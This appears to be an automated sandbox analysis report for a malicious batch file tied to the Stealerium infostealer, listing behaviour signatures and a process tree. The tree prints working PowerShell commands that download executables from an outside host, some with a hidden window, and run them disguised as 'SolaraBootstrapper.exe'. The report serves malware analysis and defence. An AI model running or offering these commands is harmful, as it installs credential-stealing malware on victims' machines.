Analysis Overview
SHA256
295303516fe6fed6586432afa4e9c0385c526786ae3c6a3be1cc8a561a2a100c
Threat Level: Known bad
The file daun.bat was found to be: Known bad.
Malicious Activity Summary
Stealerium
Blocklisted process makes network request
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Delays execution with timeout.exe
Opens file in notepad (likely ransom note)
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Kills process with taskkill
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-14 19:07
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-14 19:07
Reported
2024-06-14 19:24
Platform
win10v2004-20240611-en
Max time kernel
1019s
Max time network
1022s
Command Line
Signatures
Stealerium
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\build.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\build.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\local\SolaraBootstrapper.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\build.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\build.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\local\SolaraBootstrapper.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
| N/A | N/A | C:\Windows\System32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\daun.bat"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffb74c46f8,0x7fffb74c4708,0x7fffb74c4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4104 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4708 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4708 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3376 /prefetch:8
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\sorka.bat
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\sorka.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://a0995400.xsph.ru/build.exe' -OutFile 'C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe'"
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp60C8.tmp.bat
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\taskkill.exe
TaskKill /F /IM 800
C:\Windows\SysWOW64\timeout.exe
Timeout /T 2 /Nobreak
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4804 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2052,17169067944488093041,12935736067642510512,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5228 /prefetch:8
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\sorka.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\sorka.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'http://a0995400.xsph.ru/SolaraMain.exe' -OutFile 'C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe'"
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Windows\system32\cmd.exe
cmd.exe
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\sorka.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\sorka.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://a0995400.xsph.ru/SolaraMain.exe' -OutFile 'C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe'"
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Windows\system32\cmd.exe
cmd.exe
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\sorka.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\sorka.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://a0995400.xsph.ru/SolaraMain.exe' -OutFile 'C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe'"
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Windows\system32\cmd.exe
cmd.exe
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\sorka.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\sorka.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://a0995400.xsph.ru/build.exe' -OutFile 'C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe'"
C:\Windows\system32\cmd.exe
cmd.exe
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\sorka.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\sorka.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://a0995400.xsph.ru/build.exe' -OutFile 'C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe'"
C:\Windows\system32\cmd.exe
cmd.exe
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\sorka.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\sorka.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://a0995400.xsph.ru/build.exe' -OutFile 'C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe'"
C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe
C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9C15.tmp.bat
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\taskkill.exe
TaskKill /F /IM 2372
C:\Windows\SysWOW64\timeout.exe
Timeout /T 2 /Nobreak
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\sorka.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\sorka.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://a0995400.xsph.ru/build.exe' -OutFile 'C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe'"
C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe
C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp17FC.tmp.bat
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\taskkill.exe
TaskKill /F /IM 2948
C:\Windows\SysWOW64\timeout.exe
Timeout /T 2 /Nobreak
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\sorka.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\sorka.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://a0995400.xsph.ru/build.exe' -OutFile 'C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe'"
C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe
C:\Users\Admin\AppData\Local\SolaraBootstrapper.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpC8AE.tmp.bat
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\taskkill.exe
TaskKill /F /IM 1168
C:\Windows\SysWOW64\timeout.exe
Timeout /T 2 /Nobreak
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\sorka.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\sorka.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'http://a0995400.xsph.ru/build.exe' -OutFile 'C:\Users\Admin\AppData\Local\build.exe'"
C:\Users\Admin\AppData\Local\build.exe
C:\Users\Admin\AppData\Local\build.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9499.tmp.bat
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\taskkill.exe
TaskKill /F /IM 4348
C:\Windows\SysWOW64\timeout.exe
Timeout /T 2 /Nobreak
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\sorka.bat
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffb430ab58,0x7fffb430ab68,0x7fffb430ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1756 --field-trial-handle=1944,i,5857168189195339794,11069501404251141703,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1944,i,5857168189195339794,11069501404251141703,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2264 --field-trial-handle=1944,i,5857168189195339794,11069501404251141703,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3092 --field-trial-handle=1944,i,5857168189195339794,11069501404251141703,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3108 --field-trial-handle=1944,i,5857168189195339794,11069501404251141703,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4404 --field-trial-handle=1944,i,5857168189195339794,11069501404251141703,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4556 --field-trial-handle=1944,i,5857168189195339794,11069501404251141703,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4592 --field-trial-handle=1944,i,5857168189195339794,11069501404251141703,131072 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
